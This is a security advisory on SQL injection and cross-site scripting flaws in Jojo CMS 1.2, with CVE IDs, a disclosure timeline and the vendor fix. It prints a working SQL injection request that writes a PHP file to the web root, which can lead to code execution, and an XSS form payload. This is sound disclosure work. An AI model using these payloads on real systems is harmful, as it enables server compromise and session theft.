Stay in Touch

Application security insights and invitations to exclusive events in your inbox


Your data will stay confidential Private and Confidential

Multiple Vulnerabilities in Jojo CMS

Advisory ID:HTB23153
Product:Jojo CMS
Vendor:The Jojo Team
Vulnerable Versions:1.2 and probably prior
Tested Version:1.2
Advisory Publication:April 17, 2013 [without technical details]
Vendor Notification:April 17, 2013
Vendor Fix:May 6, 2013
Public Disclosure:May 15, 2013
Latest Update:May 14, 2013
Vulnerability Type:SQL Injection [CWE-89]
Cross-Site Scripting [CWE-79]
CVE References:CVE-2013-3081
CVE-2013-3082
Risk Level:Medium
CVSSv2 Base Scores:6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Jojo CMS, which can be exploited to perform SQL Injection and Cross-Site Scripting (XSS) attacks.

1) SQL Injection in Jojo CMS: CVE-2013-3081
The vulnerability is caused by insufficient filtration of user-supplied input passed to the "X-Forwarded-For" HTTP header in "/articles/test/" URI. A remote unauthenticated attacker can send a specially crafted HTTP request and execute arbitrary SQL commands in application’s database.
The PoC code below will create a file "/var/www/file.php" containing content of "comment" table (if web and database server configurations allow):
POST /articles/test/ HTTP/1.1
X-Forwarded-For: ' OR 1=1 INTO OUTFILE '/var/www/file.php' --
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
name=name&email=user%40mail.com&website=&anchortext=&comment=comment&s ubmit=Post+Comment

The above-mentioned PoC code can be used to execute arbitrary PHP code on the vulnerable system if the attacker creates a comment containing PHP code.
Successful exploitation of the vulnerability requires that "jojo comments" plugin is enabled (disabled by default).

2) Cross-Site Scripting (XSS) in Jojo CMS: CVE-2013-3082
The vulnerability exists due to insufficient filtration of user-supplied data passed to "search" HTTP POST parameter in "/forgot-password/" URI. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
The exploitation example below uses the "alert()" JavaScript function to display user's cookies:
<form action="http://jojo/forgot-password/" method="post">
<input type="hidden" name="search" value='<script>alert(document.cookike);</script>'>
<input type="submit" id="btn">
</form>


ImmuniWeb® On-Demand Web Application Penetration Test


Solution:
Upgrade to Jojo CMS to version 1.2.2

More Information:
https://github.com/JojoCMS/Jojo-CMS
https://github.com/JojoCMS/Jojo-CMS/commit/972757c4500d94b4b1306bf092e678add3a987d8
https://github.com/JojoCMS/Jojo-CMS/commit/9c000f961635e35e9984a8c16ca69c2cbf2d2236


References:
[1] High-Tech Bridge Advisory HTB23153 - https://www.htbridge.com/advisory/HTB23153 - Multiple vulnerabilities in Jojo CMS
[2] Jojo CMS - http://www.jojocms.org/ - Jojo is a PHP-based free CMS for web developers wanting to build good websites.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
User Comments
Add Comment


Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
ImmuniWeb
Technology
Products
Trial